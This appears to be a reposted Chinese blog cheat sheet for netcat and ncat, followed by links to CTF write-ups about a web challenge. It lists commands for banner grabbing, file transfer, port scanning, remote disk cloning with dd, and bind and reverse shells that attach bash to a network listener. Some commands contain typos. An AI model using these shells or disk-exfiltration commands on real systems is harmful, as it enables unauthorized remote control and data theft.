一个假猪套神器:NET CAT-NC
引:NAT CAT有”瑞士军刀“的美称,支持跨平台的使用。
- 小身材,大智慧
- 侦听模式/传输模式
- telnet/获取banner信息
- 传输文本信息
- 传输文件/目录
- 加密传输文件
- 远程控制/木马
- 加密所有流量
- 流媒体服务器
- 远程克隆硬盘
NC TELNET /BANNER :
- nc -nv 1.1.1.1 80
- nc -nv 1.1.1.1 25
- nc -nv 1.1.1.1 110
NC 传输文件/目录:
传输文件
- A:nc -lp 333>1.mp4
- B:nc -nv IP 端口<1.mp4 -q 1(传递连接完毕后1秒断开)
- 或
- A:nc -q l -lp 333 <a.mp4
- B:nc -nv 1.1.1.1 333>2.mp4
传输目录
- A:tar -cvf -music/ | nc -lp 333 -q 1
- B:nc -nv IP 端口 | tar -xvf -
加密传文件
- A: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256-m ecb >1.mp4
- B: mcrypt --flush -Fbq -a rijindael-256 -m ecb <a.mp4 | nc -nv IP 端口 -q 1
NC-流媒体服务
- A:cat 1.mp4 | nc -lp 333
- B: IP 端口 | mplayer -vo x11 -cache 3000 -
NC 端口扫描
- nc -nvz ip 端口范围(TCP协议)
- nc -nvzu ip 端口范围(UDP协议)
NC 远程克隆硬盘
- A: nc lp 333 | dd of= /dev/sda
- B: dd if=/dev/sda | nc -nv IP 端口 -q 1
- 远程电子取证,可以将目标服务器硬盘远程复制,或者内存。
NC 远程控制
PS:建立连接后可以实现双向的控制(服务器端与控制端)。
正向连接:
- A:nc -lp 333 -c bash
- B:nc ip 端口
反向连接:
- A: nc -lp 333
- B:nc ip 端口 -c(连接建立后生成一个shell) bash
NC:NCAT
- NC缺乏加密与验证能力
- NCat包含于Nmap工具中
- A: ncat ncat -c bash -allow IP -vnl 端口 --ssl
- B:ncat -nv IP 端口 -ssl
- 不同系统/平台的NC参数功能不一定全部相同
转载于:https://www.cnblogs.com/HackKen/p/7787189.html
一个假猪套神器:NET CAT-NC相关推荐
- 实战篇2:假猪套天下第一
地址:https://www.cnblogs.com/widget90/p/7650890.html,一些常用的http头 地址:BUUCTF在线评测 开始时页面长这样,随便输一个用户名和密码 可以登 ...
- [BJDCTF 2nd]假猪套天下第一 详细解题思路及做法
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开是个登录界面,试着登录一下 试着登 ...
- [BJDCTF 2nd]假猪套天下第一——重新认识http请求头
buu上做到颖奇师傅的一道题 神奇的有无数道套娃 然后也学习了很多新的http请求头 记录一下 搬运自:https://www.cnblogs.com/benbenfishfish/p/5821091 ...
- [BJDCTF 2nd]假猪套天下第一
随便登陆一个: 用admin登陆试试: 暂时没有好的思路了,抓个包分析一下: 发现L0g1n.php 提示需要99年后,请求头里面有time,修改成一个很大的数字 返回信息变成了需要从本地访问,使用X ...
- BUUCTF:[BJDCTF 2nd]假猪套天下第一
先测试一下admin用户,发现会回弹 在测试一下其他账户,发现会进入 (下面那个root点进去是y1ng师傅的网站) 我们试着抓个包,发现存在着一个提示 打开这个L0g1n.php发现里面是 提示99 ...
- [BJDCTF 2nd]假猪套天下第一 个人联系分析总结
小白第一次做CTF,多有疏漏请多多指教,如有侵权请联系删除(图片均为个人截取 一开始看界面,觉得挺正常的,因为课上最后讲的暴力破解.所以当时思维就短路了,然后就是此路不通,GG. 然后我们用" ...
- CTF-Web 假猪套天下第一
进入题目,输入admin发现不能登录 用burp抓取账号123的包,发现该包进行了302跳转,在包中可获得一个跳转地址 用该地址替换掉本目录,得到一个新的页面,用burp抓取新的页面.可知需修改tim ...
- BJDCTF2nd 假猪套天下第一 Writeup
打开靶机后是一个登录页面 我们先输入一个admin和123456试试 真调皮,那我们什么都不输入再登录一次 我真的是越来越喜欢Y1ng师傅出的题了 试了,F12,robots协议,看了网页源代码没发现 ...
- [BJDCTF 2nd]假猪套天下第一 -wp
有一个登入框,使用任意非admin账户抓包登入 发现有个L0g1n.php 直接登入后查看源代码是看不到提示的 访问页面抓包 提示要99年后,修改一下time参数 改为999999999(反正多加几个 ...
最新文章
- c# usercontrol ,networkcomms3.0 Invoke总结
- 【C++ 语言】Visual Studio 配置 POSIX 线程 ( Windows 不支持 POSIX | 配置文件下载 | 库文件说明 | 配置过程 )
- 运用ajax技术写联动的效果
- Windows Server 2012 网络负载均衡
- 简述计算机图形的图形应用主要有哪些,5计算机图形学考试简答题复习.doc
- Linux学习总结(四十四)lnmp之php-fpm相关配置
- 【软件分析与挖掘】Vision of Software Clone Management: Past, Present, and Future (Keynote Paper)...
- TThread类详解转
- 一个自己主动依据xcode中的objective-c代码生成类关系图的神器
- php上js实现ajax请求,原生JS实现ajax与ajax的跨域请求实例
- Linux 14.04 CUDA theano安装
- vs2013 win10 Caffe的编译安装(微软版本)
- Bilibili宋红康老师MySQL高级篇笔记-架构篇(有完整的md格式笔记,迟点整理好会挂链接)
- 计算机系统盘怎么扩充,Win7如何给C盘扩容 Win7系统电脑C盘扩容的办法
- UFS开发板代码分析
- IDEA插件下载地址
- python程序流程控制_Python流程控制语句详解
- 普通高考录取成绩查询2021,重磅!2021年全国高考录取分数线预测
- 怎么去思考一个问题,提高解决问题的能力
- ubuntu14.04下安装图片编辑软件pinta